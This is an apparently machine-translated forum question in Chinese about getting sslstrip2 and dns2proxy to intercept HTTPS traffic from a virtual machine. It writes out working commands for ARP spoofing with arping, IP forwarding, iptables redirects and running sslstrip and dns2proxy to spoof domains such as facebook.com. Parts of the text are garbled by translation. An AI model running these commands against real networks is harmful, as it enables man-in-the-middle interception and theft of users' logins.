sslstrip2和x2B;dns2proxy-->;德萨勒特

sslstrip2和x2B;dns2proxy-->;德萨勒特,ssl,Ssl,我正在尝试拦截来自虚拟机的https流量 我正在使用sslstrip+dns2proxy将https重定向到虚拟机上的http。我有一些问题: dns2proxy似乎速度非常慢或工作不正常(我不确定我是否已按预期方式配置了.conf文件,因为我没有找到太多关于它的文档。我希望它欺骗所有域,比如facebook.com) +sslstrip未在其日志文件中记录任何内容。 最后,当我在受害者计算机上访问facebook.com时,chrome会抛出一个安全警报(我猜它链接到h2ts,但dns2pro

我正在尝试拦截来自虚拟机的https流量

我正在使用sslstrip+dns2proxy将https重定向到虚拟机上的http。我有一些问题: dns2proxy似乎速度非常慢或工作不正常(我不确定我是否已按预期方式配置了.conf文件,因为我没有找到太多关于它的文档。我希望它欺骗所有域,比如facebook.com) +sslstrip未在其日志文件中记录任何内容。 最后,当我在受害者计算机上访问facebook.com时,chrome会抛出一个安全警报(我猜它链接到h2ts,但dns2proxy应该避免),但不是每次,有时,它仍然重定向到

需要帮忙吗

我所做的:

sysctl net.ipv4.ip_nonlocal_bind=1
echo 1 > /proc/sys/net/ipv4/ip_forward
arping  -U -s 192.168.1.2 -I eth0 192.168.1.1
arping  -U -s 192.168.1.1 -I eth0 192.168.1.2

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python dns2proxy.py (with .facebook.com 8.8.8.8 in the domains.conf)
sslstrip -l 9000 -a -w log_sslstrip.xt
编辑: 我将尝试使用MITMf
关于

这与编程关系不大。你可能会在或上更多地讨论这个话题。好吧,在或上有一些关于这个的帖子,所以我尝试了一下:)但是谢谢,我会尝试:)